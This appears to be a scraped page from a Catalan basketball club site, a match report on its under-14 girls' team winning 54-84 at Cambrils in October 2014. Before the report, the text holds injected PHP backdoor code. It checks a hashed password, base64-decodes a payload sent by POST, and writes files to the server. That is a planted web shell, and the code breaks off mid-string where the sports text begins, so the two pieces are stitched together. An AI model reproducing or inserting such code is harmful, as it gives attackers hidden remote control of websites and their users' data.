function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení fa un gran tercer quart i venç a la pista del Cambrils (54-84) - Tgn Bàsquet Club -

L’infantil femení fa un gran tercer quart i venç a la pista del Cambrils (54-84)

Updated: octubre 27, 2014

L’equip infantil femení del TGN Bàsquet va aconseguir una victòria de prestigi a la pista del Cambrils després de fer una gran segona meitat. Ambdós equips arribaven a la cita amb un balanç de 3 victòries i 0 derrotes i això feia preveure un partit igualat. Així va ser durant els dos primers quarts en què el conjunt tarragoní va aguantar les escomeses del seu rival tot i demostrar algunes mancances en la seva concentració. La jugadora local Barreiro, 19 punts al final del matx, va mantenir el conjunt cambrilenc per davant en el marcador durant molts minuts però tot va canviar en el tercer quart. Un parcial de sortida d 0-19 en 5 minuts va desequilibrar l’enfrontament. El TGN Bàsquet rebotejava amb autoritat i sortia ràpidament al contraatac. El Cambrils no va poder fer res per aturar-ho i va veure amb impotència com les tarragonines marcaven un parcial en la segona meitat de 27-51 que els atorgava la victòria.